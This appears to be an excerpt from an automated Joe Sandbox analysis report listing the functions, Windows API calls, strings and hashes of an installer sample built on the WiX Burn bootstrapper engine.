                                                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(00000000,00000000,00000001,0000000C,00000000,?,00000000,00000000,0000000C,00000000,00000000,00000000,00000000,00958FA8,?,00000000), ref: 008E3FF5
                                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 008E4064
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008E4071
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 008E4085
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 008E412A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to concatenate the temp folder and log prefix., xrefs: 008E3F85
                                                                                                                                                                                                                                                                            • failed to allocate memory for the temp path, xrefs: 008E4108
                                                                                                                                                                                                                                                                            • Failed to create temp file: %ls, xrefs: 008E40BD
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 008E3F3B, 008E3FC7, 008E4117
                                                                                                                                                                                                                                                                            • Failed to combine directory and log prefix., xrefs: 008E3F2C
                                                                                                                                                                                                                                                                            • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 008E4037
                                                                                                                                                                                                                                                                            • Failed to copy temp path to return., xrefs: 008E40E9
                                                                                                                                                                                                                                                                            • .Wu@1Wu, xrefs: 008E412A
                                                                                                                                                                                                                                                                            • Failed to ensure temp file path exists: %ls, xrefs: 008E3FB8
                                                                                                                                                                                                                                                                            • Failed to get temp folder., xrefs: 008E3F5D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateErrorFileHandleLastLocalSleepTime
                                                                                                                                                                                                                                                                            • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$Failed to combine directory and log prefix.$Failed to concatenate the temp folder and log prefix.$Failed to copy temp path to return.$Failed to create temp file: %ls$Failed to ensure temp file path exists: %ls$Failed to get temp folder.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\pathutil.cpp$failed to allocate memory for the temp path$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1968021109-2646403823
                                                                                                                                                                                                                                                                            • Opcode ID: c5b9e0164011f02334906e483f33089155aa30162a80eced3606e943fc9e8447
                                                                                                                                                                                                                                                                            • Instruction ID: 2ba7cb863ea1ecfdf2318c960462c0202512af9903e9f522365985470e807025
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5b9e0164011f02334906e483f33089155aa30162a80eced3606e943fc9e8447
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE818371E40259BBDF219B9ACC49FAEBAB8FB5A714F010125FA14F72D0D6709D408BA1
                                                                                                                                                                                                                                                                            Function 0090E800 Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 232COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0090E825
                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE ref: 0090EACD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                            • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3442037557-242603754
                                                                                                                                                                                                                                                                            • Opcode ID: bc7543e7f7ca70259ae217dc3899ed2681f4e6d0ff05cb2ca3a3612f4696b42a
                                                                                                                                                                                                                                                                            • Instruction ID: 9b0b3784be3ff6a919fe11438742d550a5c737a7a9a7869a9914596551251442
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc7543e7f7ca70259ae217dc3899ed2681f4e6d0ff05cb2ca3a3612f4696b42a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73618C7AF95222BFD72097988C46F7B615CFB89B10F190E25FD11BB3C0E2689C0092D6
                                                                                                                                                                                                                                                                            Function 0093B0E2 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 192COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0097D4F0,00000000,00000000,00000001,0000000C,0000000C,?,008FA885,00000000,00000001,00958FA8,?,00000000,00000000,0000000C,00000000), ref: 0093B0F7
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(0097D4F0,?,008FA885,00000000,00000001,00958FA8,?,00000000,00000000,0000000C,00000000,00000001,00000000,00000000,00000000,00000008), ref: 0093B2F9
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                            • String ID: @1Wu$Failed to combine the log path.$Failed to copy log path.$Failed to create log based on current system time.$Failed to ensure log file directory exists: %ls$Failed to expand the log path.$Failed to get log directory.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\logutil.cpp$failed to create log file: %ls
                                                                                                                                                                                                                                                                            • API String ID: 3168844106-3209006981
                                                                                                                                                                                                                                                                            • Opcode ID: 033693323e2cb560d3e27a247f60b572ad91c366c67eff76fba2a1d5802e0e6f
                                                                                                                                                                                                                                                                            • Instruction ID: c5c69b3f3cd2eb1ed3cf0a464fb6d2f06d528ee9e2301b0829ada0cfb99c6498
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 033693323e2cb560d3e27a247f60b572ad91c366c67eff76fba2a1d5802e0e6f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D510672B45358BBDB219BA9CC4AFAF3A79EF51B54F004210FA08BA1E1D7709D40AE50
                                                                                                                                                                                                                                                                            Function 0090EE8B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 123COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,?,00000000,?,?,008EED4D,?,00000000,?,008EEE16), ref: 0090EEC9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,008EED4D,?,00000000,?,008EEE16,008E7D9B,?,?,008E7DDB,008E7DDB,00000000,?,00000000), ref: 0090EED6
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                            • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp$wininet.dll
                                                                                                                                                                                                                                                                            • API String ID: 545576003-3725142438
                                                                                                                                                                                                                                                                            • Opcode ID: 617f036da730ce1fdfa9836dd832f57e670744c27895bba5aa37a8c4ed447099
                                                                                                                                                                                                                                                                            • Instruction ID: 898d9c44f4c3f4e381ccff38e26bd27ff2e0c0bf1b329185c8da9d7bbf4c7977
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 617f036da730ce1fdfa9836dd832f57e670744c27895bba5aa37a8c4ed447099
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E31EAB2A85B377FE32153294C49F7B695CEB45BA4F014921BE50FB2C1E6A4DC0052F5
                                                                                                                                                                                                                                                                            Function 008EA0D7 Relevance: 22.7, APIs: 2, Strings: 13, Instructions: 177COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000,008E7D5B,00000000,008E7DDB,?,?,008EB898,00000002,?,8D4BE800,00000000), ref: 008EA0E6
                                                                                                                                                                                                                                                                              • Part of subcall function 008E8306: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,00000000,?,008E9840,008E9840,?,008E8154,?,?,00000000), ref: 008E8342
                                                                                                                                                                                                                                                                              • Part of subcall function 008E8306: GetLastError.KERNEL32(?,008E8154,?,?,00000000,?,00000000,008E9840,?,008EB468,?,?,?,?,?), ref: 008E8371
                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(00000000,?,?,00000000,8D4BE800,00000000), ref: 008EA2AD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Setting hidden variable '%ls', xrefs: 008EA1C6
                                                                                                                                                                                                                                                                            • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 008EA2BF
                                                                                                                                                                                                                                                                            • Setting numeric variable '%ls' to value %lld, xrefs: 008EA209
                                                                                                                                                                                                                                                                            • Setting version variable '%ls' to value '%ls', xrefs: 008EA1F2
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008EA17D, 008EA29F
                                                                                                                                                                                                                                                                            • Failed to insert variable '%ls'., xrefs: 008EA12E
                                                                                                                                                                                                                                                                            • Setting %ls variable '%ls' to value '%ls', xrefs: 008EA233
                                                                                                                                                                                                                                                                            • Attempt to set built-in variable value: %ls, xrefs: 008EA188
                                                                                                                                                                                                                                                                            • formatted, xrefs: 008EA223
                                                                                                                                                                                                                                                                            • string, xrefs: 008EA22A, 008EA232
                                                                                                                                                                                                                                                                            • Unsetting variable '%ls', xrefs: 008EA242
                                                                                                                                                                                                                                                                            • Failed to find variable value '%ls'., xrefs: 008EA101
                                                                                                                                                                                                                                                                            • Failed to set value of variable: %ls, xrefs: 008EA28D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                                                                                                                                            • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting %ls variable '%ls' to value '%ls'$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%ls'$Unsetting variable '%ls'$d:\a\wix4\wix4\src\burn\engine\variable.cpp$formatted$string
                                                                                                                                                                                                                                                                            • API String ID: 2716280545-2464245954
                                                                                                                                                                                                                                                                            • Opcode ID: 5ffcaf436b874aaed23c3cd4208fcb13d4ca81740f81353715399dfa8fd0cddd
                                                                                                                                                                                                                                                                            • Instruction ID: b56b894788b8ba546a1ca025945603fa4c9709e61a82452fe028ff53fa50c784
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ffcaf436b874aaed23c3cd4208fcb13d4ca81740f81353715399dfa8fd0cddd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A51C531640291BBDB399A57CC4AF673AA9FB93F15F100019FA05F61C1D2B2E940C6A3
                                                                                                                                                                                                                                                                            Function 008FA5BE Relevance: 21.4, APIs: 1, Strings: 13, Instructions: 364sleepCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000007D0,00000008,?,00000000,00000000,?,?), ref: 008FA749
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to copy log file path from command line., xrefs: 008FA63A
                                                                                                                                                                                                                                                                            • Failed to initialize logging., xrefs: 008FA660
                                                                                                                                                                                                                                                                            • log, xrefs: 008FA6F5
                                                                                                                                                                                                                                                                            • Failed to copy default log prefix., xrefs: 008FA6D3
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\logging.cpp, xrefs: 008FA64C, 008FA66F, 008FA7DA
                                                                                                                                                                                                                                                                            • Failed to get parent directory from '%ls'., xrefs: 008FA850
                                                                                                                                                                                                                                                                            • Failed to copy log path to prefix., xrefs: 008FA903
                                                                                                                                                                                                                                                                            • Failed to copy default log extension., xrefs: 008FA706
                                                                                                                                                                                                                                                                            • Failed to open log: %ls, xrefs: 008FA7C8
                                                                                                                                                                                                                                                                            • Failed to copy log extension to extension., xrefs: 008FA930
                                                                                                                                                                                                                                                                            • Failed to get non-session specific TEMP folder., xrefs: 008FA8A5
                                                                                                                                                                                                                                                                            • Failed to copy full log path to prefix., xrefs: 008FA95B
                                                                                                                                                                                                                                                                            • Setup, xrefs: 008FA6C2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                            • String ID: Failed to copy default log extension.$Failed to copy default log prefix.$Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log file path from command line.$Failed to copy log path to prefix.$Failed to get non-session specific TEMP folder.$Failed to get parent directory from '%ls'.$Failed to initialize logging.$Failed to open log: %ls$Setup$d:\a\wix4\wix4\src\burn\engine\logging.cpp$log
                                                                                                                                                                                                                                                                            • API String ID: 3472027048-3437580743
                                                                                                                                                                                                                                                                            • Opcode ID: 993061878bc27cfe48cbeb093f313289845cdc6f8c3fc394caa63a3156eef2fc
                                                                                                                                                                                                                                                                            • Instruction ID: e81c462f4c48856bf0b7a6ef360d7e6f7861dacf65976a316327d7b9d27ce6a2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 993061878bc27cfe48cbeb093f313289845cdc6f8c3fc394caa63a3156eef2fc
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EB1F5B1A0031ABAEB299B75CC45F7777A8FF54724F144125FA08EB181E7B0DC408BA2
                                                                                                                                                                                                                                                                            Function 0090DE80 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 121fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 0090DEB0
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 0090DEC6
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 0090DECF
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(00000000,?,?), ref: 0090DED6
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0090DEE0
                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 0090DF7F
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0090DF8C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
                                                                                                                                                                                                                                                                            • String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$d:\a\wix4\wix4\src\burn\engine\cabextract.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3030546534-373254902
                                                                                                                                                                                                                                                                            • Opcode ID: 55192d8e83915de60b3c4aa153e41a1368e76503bc9a14696247032e5e61ccd9
                                                                                                                                                                                                                                                                            • Instruction ID: 479fd17c0921028cdefcbdefd0d10c5f7162d6d97139d25f2c1d1c76e7db1283
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55192d8e83915de60b3c4aa153e41a1368e76503bc9a14696247032e5e61ccd9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A831D576952621BBEB21AB998C4DF9F3E6DEF46B60F114150FE05BB2D0D7B09800D6A0
                                                                                                                                                                                                                                                                            Function 009429EA Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 112COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: LoadLibraryExW.KERNEL32(?,00000000,00000800,00000000,?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?), ref: 008E1855
                                                                                                                                                                                                                                                                              • Part of subcall function 008E1839: GetLastError.KERNEL32(?,008E1645,?,?,?,?,?,?,008E115A,cabinet.dll,00000009,?,?,00000000), ref: 008E1866
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,00000000,008E6570,00000000,?,?,?,0094284A,00000000,?,008E6C5C,00000000), ref: 00942B11
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,00000000,008E6570,00000000,?,?,?,0094284A,00000000,?,008E6C5C), ref: 00942B20
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLibrary$ErrorLastLoadTask
                                                                                                                                                                                                                                                                            • String ID: Failed to backslash terminate shell folder path: %ls$Failed to copy shell folder path: %ls$Failed to find SHGetKnownFolderPath entry point.$Failed to get known folder path.$Failed to load shell32.dll.$SHGetKnownFolderPath$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\shelutil.cpp$shell32.dll
                                                                                                                                                                                                                                                                            • API String ID: 3444712580-2659096373
                                                                                                                                                                                                                                                                            • Opcode ID: 32a0ea28a56ebc705ed31a24028837f93230efea8eb65a57e3835c863838a277
                                                                                                                                                                                                                                                                            • Instruction ID: ea656c6146b70b95dd45a3201f634d28e36e5656a546eecdce81b26877c6c4ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 32a0ea28a56ebc705ed31a24028837f93230efea8eb65a57e3835c863838a277
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B431D572EC0224B7EB326B958C0EFAF6E69FB46B54F414151FE04BA1D2D7B08E40D591
                                                                                                                                                                                                                                                                            Function 00902AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 80COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,00000000,00000000,?,?,009034D1,00000000,?), ref: 00902AF3
                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,?,009034D1,00000000,?), ref: 00902AFD
                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNELBASE(00000000,?,?,009034D1,00000000,?), ref: 00902B04
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,009034D1,00000000,?), ref: 00902B0E
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF,009034D1,00000000,?), ref: 00902BAF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentHandleProcess$CloseDuplicateErrorLast
                                                                                                                                                                                                                                                                            • String ID: -%ls=%Iu$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$d:\a\wix4\wix4\src\burn\engine\core.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 4224961946-3799686971
                                                                                                                                                                                                                                                                            • Opcode ID: 8a024843d3d94718ffb00e3f336e00b2e66b39646ea7eabf9d51ba7801424dfe
                                                                                                                                                                                                                                                                            • Instruction ID: 6946eb6fcd775a5bd9bab27f72f9c9c097c31af87c1ab16fb1b3aaeda944003a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a024843d3d94718ffb00e3f336e00b2e66b39646ea7eabf9d51ba7801424dfe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB219875940315BBDB219BA99C0EF9E7B6CAF46765F100251BE20F71D0E2B09D109791
                                                                                                                                                                                                                                                                            Function 0093B796 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
